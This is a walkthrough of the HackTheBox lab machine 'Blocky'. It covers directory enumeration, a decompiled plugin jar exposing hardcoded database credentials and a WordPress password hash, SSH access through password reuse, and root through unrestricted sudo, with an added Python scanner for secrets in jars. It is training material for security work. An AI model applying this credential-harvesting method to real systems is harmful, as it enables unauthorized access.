HackTheBox “Blocky” Walkthrough
Blocky, an easy-level Linux machine on HackTheBox, definitely needed some patience during enumeration. Can you believe there were these sneaky Java JAR files hidden away under the /plugins path? Well, luckily, I stumbled upon them and got my hands on some credentials that a user on the box had reused. Thanks to those, I managed to snag SSH access and dive deeper into the fun!
But the real excitement kicked in when I discovered that the user had been granted some cool sudo powers. With the right password, they could run any command as root! So, I didn’t waste a second and made the most of it by using “sudo su.” And voilà, I got root privileges!
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to run a full port scan for open ports and services:
While visiting the target on port 80, we needed to add the target’s IP and the domain to /etc/hosts.
Nothing interesting there, so the next step is a Feroxbuster scan to identify hidden files or directories:
└─$ sudo feroxbuster -u http://blocky.htb -d 2 -C 404,403,405,500
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://blocky.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
💢 Status Code Filters │ [404, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 11l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 313c http://blocky.htb/wp-content => http://blocky.htb/wp-content/
301 GET 9l 28w 311c http://blocky.htb/wp-admin => http://blocky.htb/wp-admin/
200 GET 209l 846w 5836c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js
200 GET 225l 400w 3646c http://blocky.htb/wp-content/themes/twentyseventeen/assets/css/ie8.css
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-widget.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/nav-menu.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-curl.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-matchesmapregex.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/deprecated.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-customize-manager.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-meta-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-embed.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-proxy.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/taxonomy.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class.wp-dependencies.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/option.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-load.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/kses.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-feed-cache-transient.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-network.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-post.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-blogs.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-cookie.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-pop3.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-ajax-response.php
301 GET 9l 28w 310c http://blocky.htb/plugins => http://blocky.htb/plugins/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/default-constants.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-editor.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-locale-switcher.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/shortcodes.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/user.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/author-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/plugin.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-user.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/media-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-network-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-term.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/load.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/compat.php
301 GET 9l 28w 313c http://blocky.htb/javascript => http://blocky.htb/javascript/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-deprecated.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-theme.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/wp-db.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/atomlib.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-comment-query.php
200 GET 43l 43w 1045c http://blocky.htb/wp-includes/wlwmanifest.xml
301 GET 9l 28w 307c http://blocky.htb/wiki => http://blocky.htb/wiki/
301 GET 9l 28w 313c http://blocky.htb/phpmyadmin => http://blocky.htb/phpmyadmin/
301 GET 9l 28w 314c http://blocky.htb/wp-includes => http://blocky.htb/wp-includes/
200 GET 326l 1144w 10330c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/html5.js
200 GET 249l 928w 7682c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/global.js
200 GET 31l 90w 683c http://blocky.htb/wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js
200 GET 2l 281w 10056c http://blocky.htb/wp-includes/js/jquery/jquery-migrate.min.js
301 GET 0l 0w 0c http://blocky.htb/index.php/ => http://blocky.htb/
200 GET 6l 1435w 97184c http://blocky.htb/wp-includes/js/jquery/jquery.js
200 GET 4282l 8552w 82584c http://blocky.htb/wp-content/themes/twentyseventeen/style.css
200 GET 1l 9w 1398c http://blocky.htb/wp-includes/js/wp-embed.min.js
200 GET 0l 0w 0c http://blocky.htb/wp-includes/query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/date.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/http.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/rewrite.php
200 GET 70l 199w 2397c http://blocky.htb/wp-login.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post-thumbnail-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/link-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/functions.wp-styles.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-site-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-dependency.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post-formats.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/pluggable-deprecated.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/bookmark.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-roles.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-widget-factory.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-role.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-site.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-rewrite.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/capabilities.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/category-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-taxonomy.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/pluggable.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-comment.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/bookmark-template.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-user-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-customize-nav-menus.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-error.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-list-util.php
200 GET 1l 2522w 52657c http://blocky.htb/index.php/wp-json
200 GET 313l 3592w 52227c http://blocky.htb/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-hook.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-walker.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-tax-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/functions.wp-scripts.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-requests.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-admin-bar.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/cache.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/embed.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/canonical.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-response.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-default-constants.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-phpmailer.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/formatting.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-post-type.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/revision.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-encoding.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-session-tokens.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/admin-bar.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/cron.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-phpass.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-customize-widgets.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-metadata-lazyloader.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-oembed-controller.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/category.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-json.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/comment.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-oembed.php
200 GET 1l 4w 29c http://blocky.htb/wp-includes/ms-files.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-http-streams.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/ms-functions.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/feed.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/rest-api.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/theme.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-smtp.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/widgets.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/version.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-term-query.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/l10n.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/class-wp-locale.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/post.php
200 GET 0l 0w 0c http://blocky.htb/wp-includes/meta.php
301 GET 9l 28w 321c http://blocky.htb/wp-content/plugins => http://blocky.htb/wp-content/plugins/
301 GET 9l 28w 315c http://blocky.htb/wp-admin/css => http://blocky.htb/wp-admin/css/
301 GET 9l 28w 323c http://blocky.htb/phpmyadmin/templates => http://blocky.htb/phpmyadmin/templates/
301 GET 9l 28w 316c http://blocky.htb/phpmyadmin/js => http://blocky.htb/phpmyadmin/js/
301 GET 9l 28w 320c http://blocky.htb/phpmyadmin/themes => http://blocky.htb/phpmyadmin/themes/
301 GET 9l 28w 316c http://blocky.htb/plugins/files => http://blocky.htb/plugins/files/
301 GET 9l 28w 317c http://blocky.htb/phpmyadmin/doc => http://blocky.htb/phpmyadmin/doc/
301 GET 9l 28w 317c http://blocky.htb/plugins/assets => http://blocky.htb/plugins/assets/
301 GET 9l 28w 317c http://blocky.htb/phpmyadmin/sql => http://blocky.htb/phpmyadmin/sql/
401 GET 14l 54w 457c http://blocky.htb/phpmyadmin/setup
301 GET 9l 28w 320c http://blocky.htb/phpmyadmin/locale => http://blocky.htb/phpmyadmin/locale/
301 GET 9l 28w 320c http://blocky.htb/wp-content/themes => http://blocky.htb/wp-content/themes/
200 GET 0l 0w 0c http://blocky.htb/wp-includes/comment-template.php
301 GET 9l 28w 320c http://blocky.htb/wp-admin/includes => http://blocky.htb/wp-admin/includes/
301 GET 9l 28w 314c http://blocky.htb/wp-admin/js => http://blocky.htb/wp-admin/js/
301 GET 9l 28w 318c http://blocky.htb/wp-admin/images => http://blocky.htb/wp-admin/images/
301 GET 9l 28w 320c http://blocky.htb/javascript/jquery => http://blocky.htb/javascript/jquery/
301 GET 9l 28w 319c http://blocky.htb/wp-admin/network => http://blocky.htb/wp-admin/network/
301 GET 9l 28w 317c http://blocky.htb/wp-admin/maint => http://blocky.htb/wp-admin/maint/
[####################] - 2m 210280/210280 0s found:151 errors:141227
[####################] - 2m 30000/30000 332/s http://blocky.htb/
[####################] - 2m 30000/30000 333/s http://blocky.htb/wp-content/
[####################] - 2m 30000/30000 308/s http://blocky.htb/wp-admin/
[####################] - 13s 30000/30000 2254/s http://blocky.htb/wp-includes/ => Directory listing
[####################] - 2m 30000/30000 312/s http://blocky.htb/plugins/
[####################] - 89s 30000/30000 336/s http://blocky.htb/javascript/
[####################] - 2m 30000/30000 317/s http://blocky.htb/wiki/
[####################] - 2m 30000/30000 319/s http://blocky.htb/phpmyadmin/
While exploring the numerous directories, I stumbled upon a particular one: /plugins/files.
To proceed, we download the BlockyCore.jar file from there and decompile it, for example with an online decompiler. The decompilation yields the following:
//
// Decompiled by Procyon v0.5.36
//
package com.myfirstplugin;

public class BlockyCore
{
    public String sqlHost;
    public String sqlUser;
    public String sqlPass;

    // Database credentials are compiled straight into the class: anyone who can
    // download the jar can read them.
    public BlockyCore() {
        this.sqlHost = "localhost";
        this.sqlUser = "root";
        this.sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    }

    public void onServerStart() {
    }

    public void onServerStop() {
    }

    public void onPlayerJoin() {
        this.sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }

    public void sendMessage(final String username, final String message) {
    }
}
The results include the login credentials of an SQL user (sqlUser) and the corresponding password (sqlPass):
sqlUser = "root";
sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
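The decompiler made the secret obvious by eye; as an added example (not from the original post or the BlockyCraft plugin), the Python below does the same check programmatically for anyone who has to vet plugin jars before deploying them: it walks a jar, parses each class file's constant pool and reports string literals that look like credentials in classes that name a password-like field. The scanned jar is constructed inside the block to mirror the decompiled class; build_jar, scan_jar and the heuristic thresholds are this example's own assumptions.

```python
import io, re, struct, zipfile

FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}  # payload bytes per fixed-size tag; tag 1 (Utf8) varies
SENSITIVE = re.compile(r"(?i)pass|pwd|secret|token|apikey|credential")

def constant_pool(data):
    """Parse a .class file's constant pool into {index: (tag, payload)}."""
    assert data[:4] == b"\xca\xfe\xba\xbe", "not a class file"
    count, pos, i, pool = struct.unpack(">H", data[8:10])[0], 10, 1, {}
    while i < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:  # CONSTANT_Utf8: u2 length, then the bytes
            ln = struct.unpack(">H", data[pos:pos + 2])[0]
            pool[i], pos = (1, data[pos + 2:pos + 2 + ln].decode("utf-8", "replace")), pos + 2 + ln
        else:
            pool[i], pos = (tag, data[pos:pos + FIXED[tag]]), pos + FIXED[tag]
        i += 2 if tag in (5, 6) else 1  # Long/Double occupy two pool slots
    return pool

def looks_like_secret(s):  # 8+ chars, no whitespace, 3 of 4 character classes: "root"/"localhost" drop out
    return len(s) >= 8 and not re.search(r"\s", s) and sum(
        bool(re.search(p, s)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^\w]")) >= 3

def suspicious_literals(data):
    """String literals (CONSTANT_String) of a class that also names a password-like field."""
    pool = constant_pool(data)
    if not any(t == 1 and SENSITIVE.search(v) for t, v in pool.values()):
        return []
    refs = [pool.get(struct.unpack(">H", v)[0]) for t, v in pool.values() if t == 8]
    return [r[1] for r in refs if r and r[0] == 1 and looks_like_secret(r[1])]

def scan_jar(jar_bytes):  # -> {class name: [credential-looking literals]}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        hits = {n: suspicious_literals(jar.read(n)) for n in jar.namelist() if n.endswith(".class")}
    return {n: h for n, h in hits.items() if h}

def build_jar(classes):
    """Constructed input: {class name: (identifiers, literals)} -> jar of bare constant pools."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name, (ids, lits) in classes.items():
            cp = [b"\x01" + struct.pack(">H", len(s.encode())) + s.encode() for s in ids + lits]
            cp += [b"\x08" + struct.pack(">H", len(ids) + k + 1) for k in range(len(lits))]
            jar.writestr(name, b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", len(cp) + 1) + b"".join(cp))
    return buf.getvalue()

# Constructed jar mirroring the decompiled BlockyCore class above (not a real JVM-loadable class).
DEMO_JAR = build_jar({"com/myfirstplugin/BlockyCore.class": (["sqlHost", "sqlUser", "sqlPass"],
                                                              ["localhost", "root", "8YsqfCTnvxAUeduzjNSXe22"])})
```

The classes built by build_jar carry only a constant pool, which is all the scanner reads; on a real jar the same functions run over javac output unchanged.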
Among the results yielded by Feroxbuster is “/phpmyadmin.”
We will use the credentials found in the jar file.
After having a look around, we find an entry in the wp_users table of the wordpress database.
We find the following user record (login name and password hash):
SELECT * FROM `wp_users`;
user_login: notch
user_pass:  $P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/
Exploitation:
Since port 22 (SSH) is open, let’s try logging in with the username notch and the password found in the jar file.
Privilege Escalation:
When listing the privileges of the “notch” user with sudo -l, a password prompt appears. Providing the password retrieved from the jar file once more works.
We are allowed to run any command as root, so let’s switch to root with sudo su.
Cheers.